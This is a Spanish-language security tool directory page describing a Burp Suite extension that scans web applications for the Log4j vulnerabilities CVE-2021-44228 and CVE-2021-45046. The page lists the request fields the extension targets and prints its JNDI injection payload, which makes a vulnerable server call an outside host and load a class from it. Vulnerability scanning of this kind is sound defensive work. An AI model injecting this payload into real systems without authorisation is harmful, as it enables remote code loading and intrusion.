Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Burp-Log4j-HammerTime — Extensión de Burp Active Scan para identificar vulnerabilidades de Log4j CVE-2021-44228 y CVE-2021-45046 | Kitploit
Herramientas/GitHubGitHub/dxc-strikeforce/burp-log4j-hammertime
Escáneres de VulnerabilidadesAnálisis Dinámico (Sandboxing)ExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubdxc-strikeforce/burp-log4j-hammertime

Burp-Log4j-HammerTime

Extensión de Burp Active Scan para identificar vulnerabilidades de Log4j CVE-2021-44228 y CVE-2021-45046

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
8hace 4 añosAún no revisado

Log4j-HammerTime

Esta extensión de Burp Suite Active Scanner valida la explotación de las vulnerabilidades CVE-2021-44228 y CVE-2021-45046 de Apache Log4j.

Esta extensión utiliza Burp Collaborator para verificar el problema.

Uso

  • Habilita esta extensión
  • Lanza un escaneo activo sobre un objetivo específico

Si deseas ejecutar solo las comprobaciones de este módulo, puedes importar el perfil extensions-only.json y seleccionarlo como perfil de escaneo activo.

Detalles

Durante un escaneo activo, esta extensión prueba los siguientes puntos de inserción:

  • HEADER
  • PARAM_NAME_BODY
  • PARAM_BODY
  • PARAM_NAME_URL
  • PARAM_URL
  • PARAM_COOKIE
  • PARAM_JSON
  • ENTIRE_BODY

En cada punto de inserción, se inyecta la siguiente carga útil en la solicitud: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

Además, esta extensión agrega muchas cabeceras que están habilitadas en headers (líneas sin comentar). Estas cabeceras se inyectan una a una en solicitudes separadas.

Aviso Legal

Este proyecto se ha creado únicamente con fines educativos y de pruebas éticas. El uso de Log4Shell-active-scanner para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún uso indebido o daño causado por este programa.

Licencia

El proyecto está licenciado bajo la Licencia MIT.

Autores

  • Freskimo
Descargar herramienta